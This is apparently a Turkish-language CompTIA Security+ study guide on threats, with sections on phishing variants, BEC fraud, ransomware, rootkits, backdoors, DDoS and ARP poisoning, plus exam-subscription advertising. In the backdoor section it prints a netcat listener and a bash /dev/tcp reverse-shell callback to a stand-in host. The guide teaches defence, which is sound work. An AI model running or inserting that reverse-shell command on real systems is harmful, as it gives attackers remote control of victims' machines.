CompTIA SY0-701: Tehditler, Saldırılar ve Zafiyetler — Çalışma kılavuzu

Şunun bir parçası: CompTIA Security+ SY0-701 — Çalışma kılavuzu. Doğrulanmış cevaplarla şurada pratik yapın: CompTIA sınav merkezi, veya şurada süreli deneme sınavları çözün: ExamRoll.io.

Modern tehdit ortamı, teknik istismarı insan manipülasyonuyla birleştiren, düşük önem dereceli zayıflıkları zincirleyerek yüksek etkili sızmalara dönüştüren ve faaliyetlerini meşru iş süreçleri içinde gizleyen saldırganlar tarafından tanımlanmaktadır. Tehditleri anlamak, niyeti, kabiliyeti ve vektörü anlamakla ve yüzeydeki semptomu tam bir açıklama olarak kabul etmeyi reddetmekle başlar.

Sosyal Mühendislik ve Oltalama Çeşitleri

Sosyal mühendislik, yazılım kusurlarından ziyade güven, aciliyet, otorite veya meraktan yararlanır. Geleneksel oltalama (phishing), e-posta yoluyla geniş bir ağ atar ve binlerce alıcıya sahte kargo bildirimleri veya parola sıfırlama talepleri gibi genel tuzaklar gönderir. Hedefli oltalama (spear phishing), LinkedIn, kurumsal web siteleri veya sızıntı dökümlerinden yapılan keşifleri kullanarak belirli bir kişiye veya departmana özel olarak hazırlanmış mesajlar oluşturarak odağını daraltır. Balina avı (whaling), yöneticileri hedefler — dış hukuk müşavirinden geliyormuş gibi görünen bir mesaj alan CFO klasik bir hedeftir — çünkü onların yetkisi daha yüksek etkili dolandırıcılıklara olanak tanır.

Kanal çeşitleri, aynı manipülasyonu diğer mecralara da taşır. Vishing (sesli oltalama), genellikle sahte arayan kimliği ve BT yardım masası gibi davranma bahanesiyle MFA kodlarını elde etmek için telefon görüşmelerini kullanır. Smishing, sık sık kısaltılmış URL’ler ve mobil cihaza özgü tuzaklar (“Paketiniz teslim edilemedi — buradan yeniden planlayın”) kullanarak SMS’i kullanır. Mobil tarayıcılar URL’leri kısalttığı ve sertifika ayrıntılarını gizlediği için, smishing orantısız derecede yüksek bir başarı oranına sahiptir.

İş E-postası Sahtekarlığı (BEC), genellikle hiçbir kötü amaçlı yazılım içermediği için özel bir ilgiyi hak eder. Meşru bir posta kutusunu ele geçirmiş veya benzer görünümlü bir alan adını (accounts@vend0r-corp.com yerine accounts@vendor-corp.com) taklit etmiş bir saldırgan, gerçek bir fatura yazışmasına dahil olur ve bir banka havalesini yeniden yönlendirir. E-posta içeriği bağlamsal olarak doğru olduğu ve hiçbir ek bulunmadığı için, ağ geçidi anti-malware ve URL sanal alan (sandbox) korumaları çok az koruma sağlar. FBI’ın IC3 birimi, tek bir yılda 2,9 milyar doları aşan BEC kayıpları bildirdi ve bu da onu açık ara en yüksek dolarlık siber suç kategorisi haline getirdi.

Yaygın bir tuzak, zararsız görünen belirtileri aşırı yorumlamaktır. Bir kullanıcı kimlik bilgilerini bir oltalama sitesine gönderdiğinde ve “sayfa bulunamadı” hatası aldığında, olay çözülmüş sayılmaz — bu, saldırganın kurbanı yakaladıktan sonra başka bir yere yönlendirdiği, tamamlanmış bir kimlik bilgisi toplama eylemidir. Belirgin bir hata sayfasının olmaması, saldırının başarısızlığının bir kanıtı değil, bir özelliğidir.

Kötü Amaçlı Yazılım Türleri

Kötü amaçlı yazılımlar tek tip değildir. Fidye yazılımı (Ransomware) verileri şifreler ve ödeme talep eder; Ryuk, Conti ve LockBit gibi modern varyantlar ise çifte şantaj kozu için önce verileri dışarı sızdırır. Belirgin bir gösterge, dosyaların .ryk, .locked veya rastgele bir dize olarak yeniden adlandırılması gibi toplu bir dosya uzantısı değişikliği ve her dizinde README.txt veya HOW_TO_DECRYPT.html adlı fidye notlarının bulunmasıdır.

Rootkit’ler çok daha derin bir seviyede çalışır; süreçleri, dosyaları ve ağ bağlantılarını işletim sisteminin kendisinden gizlemek için çekirdek (kernel) yapılarına, sistem çağrı tablolarına veya bellenime (bootkit’ler, UEFI implantları) kanca atar. Standart araçlar rootkit’in kontrol ettiği çekirdeği sorguladığı için, tasklist veya ps çıktısına güvenilemez; tespit genellikle çevrimdışı adli imaj almayı veya chkrootkit gibi araçlarla ya da Volatility ile bellek analizi yaparak bilinen iyi bir temel ile karşılaştırmayı gerektirir.

Arka kapılar (Backdoors), genellikle ilk sızmadan sonra yüklenen, kalıcı yetkisiz erişim sağlar. Bir komuta-kontrol sunucusuna sinyal gönderen zamanlanmış bir görev, bir uygulamaya yerleştirilmiş sabit kodlanmış bir kimlik bilgisi veya belirsiz bir portta dinleme yapan bir hizmet şeklinde olabilirler. Netcat veya Meterpreter gibi araçları kullanan ters kabuklar (reverse shells) tipiktir:

# Attacker listener
nc -lvnp 4444

# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1

Buradaki tuzak, triyaj tünel vizyonudur. Hızla karantinaya alınan “kötü amaçlı yazılım algılandı” etiketli bir uyarı, olayın bittiği anlamına gelmez — ilk bırakıcı (dropper), uç nokta aracısının göremediği bir arka kapı veya rootkit’i çoktan kurmuş olabilir.

Ağ Saldırıları

Dağıtık Hizmet Engelleme (DDoS) saldırıları erişilebilirliği hedefler. Hacimsel saldırılar — UDP flood, ICMP flood — ham bant genişliğini tüketir. Yansıtmalı/güçlendirilmiş saldırılar, istekten daha büyük yanıtlar veren üçüncü taraf hizmetleri kötüye kullanır; sahte bir kaynak adresine sahip 60 baytlık bir DNS sorgusu 3.000 baytlık bir yanıt döndürebilir ve NTP monlist veya memcached güçlendirmesi 50.000בin üzerinde oranlar elde edebilir. Genel web hizmetleri sunucuda “ayakta” kalmasına rağmen internetten erişilemez olduğunda ve ağ günlükleri bir trafik artışı gösterdiğinde, cevap neredeyse her zaman bir uygulama hatası değil, yukarı akış bağlantılarını veya durum tablolarını doyuran bir DDoS saldırısıdır.

Yol-üstü saldırıları (eski adıyla “ortadaki adam”) saldırganı iletişim halindeki iki tarafın arasına yerleştirir. Yerel bir ağda, ARP zehirlenmesi olağan mekanizmadır: saldırgan, ağ geçidinin IP’sine sahip olduğunu iddia eden istenmeyen ARP yanıtları gönderir, böylece kurban trafiği sessizce saldırganın makinesi üzerinden yönlendirilir. ettercap veya arpspoof gibi araçlar bunu otomatikleştirir, ardından saldırgan sslstrip ile TLS’yi kaldırabilir veya içerik enjekte edebilir.

Yazım hatası avcılığı (Typosquatting), yanlış yazılan URL’leri yakalamak veya oltalama ve BEC için ikna edici bir altyapı olarak hizmet etmek amacıyla meşru olanları taklit eden alan adlarını (goggle.com, paypa1.com) kaydeder.


Kimlik ve Erişim Yönetimi · Tüm alanlar · Ağ Güvenliği ve Mimarisi

Bu soruları çözün → · ExamRoll.io’da süreli pratik →

Pass the whole exam — not just this question

You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.

Sınavınızı geçin →

Related guides

Hepsi bir arada erişim

Tek abonelik. Her sınav.

Her plan, sınırsız cevap aramayı, pratik testlerini, AI açıklamalarını ve tam kaynak kütüphanesini — 20'den fazla dilde — açar.

Aylık
24.87
Just €0.83/day
Her şey dahil:
  • Sınırsız cevap arama
  • Sınırsız pratik testi
  • AI destekli açıklamalar
  • Tam kaynak kütüphanesi
  • 20+ dil
  • Haftalık içerik güncellemeleri
  • Ödüller ve yönlendirmeler
  • Öncelikli destek
Ücretsiz denemeyi başlat

Kredi kartı gerekmez*

En iyi değer
12 ay
179.87
Just €0.49/daySave 40%
Her şey dahil:
  • Sınırsız cevap arama
  • Sınırsız pratik testi
  • AI destekli açıklamalar
  • Tam kaynak kütüphanesi
  • 20+ dil
  • Haftalık içerik güncellemeleri
  • Ödüller ve yönlendirmeler
  • Öncelikli destek
Ücretsiz denemeyi başlat

Kredi kartı gerekmez*

✓ Ücretsiz plan dahil · ✓ İstediğiniz zaman iptal edin · ✓ Tüm planlar tam ürünü açar